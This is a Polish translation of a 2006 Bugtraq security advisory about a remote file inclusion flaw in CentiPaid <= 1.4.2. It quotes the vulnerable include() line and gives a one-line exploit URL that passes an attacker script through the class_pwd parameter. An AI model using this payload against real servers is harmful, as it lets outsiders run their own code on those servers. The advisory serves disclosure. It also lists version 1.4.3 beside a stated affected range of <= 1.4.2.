|
Polskie tłumaczenie bugtraqu
| Przetłumaczył: | kiero | | Temat artykułu: | CentiPaid <= 1.4.2 [$class_pwd] Zdalne włączanie zawartości pliku | | Źródło: | http://www.securityfocus.com/archive/1/450020/30/0/threaded | | Podatne wersje: | <= 1.4.2 | | Data publikacji: | 2006-10-30 21:00:42 | | Czytano: | 1580 razy |
Opis atakowanego oprogramowania :
Aplikacja : CentiPaid
Wersja : 1.4.3
URL : http://www.centipaid.com/centi/download/centipaid_php-1.4.3.tar.gz
Kod:centipaid_class.php
include($class_pwd.'/adodb/adodb.inc.php')
Exploit:
http://www.site.com/[path]/centipaid_class.php?class_pwd=[Evil_Script] |
|
|
